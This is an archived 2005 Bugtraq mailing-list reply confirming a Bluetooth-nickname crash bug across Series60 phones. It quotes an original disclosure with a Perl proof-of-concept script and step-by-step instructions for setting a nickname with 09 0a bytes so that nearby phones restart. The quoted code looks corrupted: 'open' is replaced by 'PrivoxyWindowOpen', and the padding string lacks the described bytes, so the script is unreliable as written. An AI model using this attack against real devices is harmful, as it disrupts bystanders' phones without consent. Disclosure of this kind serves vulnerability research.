[39309] in bugtraq

home help back first fref pref prev next nref lref last post

Re: Nokia Symbian 60 "BLUETOOTH NICKNAME" Remote Restart

daemon@ATHENA.MIT.EDU (Alex Renn Jr.)
Mon Jun 27 16:51:12 2005

X-Qmail-Scanner-Mail-From: ray@TXnet.com via unisys.txnet.com
Date: Mon, 27 Jun 2005 20:43:57 +0300
From: "Alex Renn Jr." <ray@TXnet.com>
Reply-To: "Alex Renn Jr." <ray@TXnet.com>
Message-ID: <81247152.20050627204357@TXnet.com>
To: Qnix@bsdmail.org
Cc: bugtraq@securityfocus.com
In-Reply-To: <20050627085523.11757.qmail@securityfocus.com>
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit

Hello Qnix@bsdmail.org!

Not only Nokia Bluetooth devices are affected.
It seems that all Series60 phones have this bug, including all firmware versions
of Siemens SX1.

====[ End of message ]====

    Best Regards,
    Alex Renn Jr.
    ray@TXnet.com

===[ Original Message ]===

From: Qnix@bsdmail.org <Qnix@bsdmail.org>
To: bugtraq@securityfocus.com <bugtraq@securityfocus.com>
Subject: Nokia Symbian 60 "BLUETOOTH NICKNAME" Remote Restart
Date: 27.06.2005 11:55

> When i was playing with my bluetooth device,
> i found that if you add in your nickname " 09 0a " in hex, it will cause that
> every one who search for available bluetooth devices and find your nickname his
> nokia phone will restart.
> you should add a nicname like that,

> [something][09 0a in hex][just add anything here]

> you should add anything before 09 0a because the nokia phones think that its
> a space at the end, and it will auto deleted so you should add any thing before
> 090a .

> nokia-bt-cx.pl
> -------------start---------------
> #!/usr/bin/perl -w

> my $btnick;
> my $bth;
> my  $bts;
> my $file;
> $bth = "        .";
> print "\n*******************************************************\n";
> print "**    NOKIA REMOTE RESTART IN BLUETOOTH NICKNAME     **\n";
> print "**      BY QNIX | Q-nix[@]bsdmail[dot]org            **\n";
> print "*******************************************************\n";
> print " \n write your nickname : ";
> $btnick = <STDIN>;
> chomp($btnick);
> print " \n OUTPUT : ";
> $file = <STDIN>;
> chomp($file);
> PrivoxyWindowOpen(BLUEN, ">>$file") || die "Could not create file $!\n";
> $bts = "$btnick$bth";
> print BLUEN ("$bts");
> close(BLUEN);
 
> print "\n Done !! , send the output to your nokia and copy the file to the bluetooth nickname space . \n\n";
> -------------end-----------------



> may be someone got more information about that bug or any thing else.
> and maybe someone can develop that problem.

===[ End of Original Message ]===


home help back first fref pref prev next nref lref last post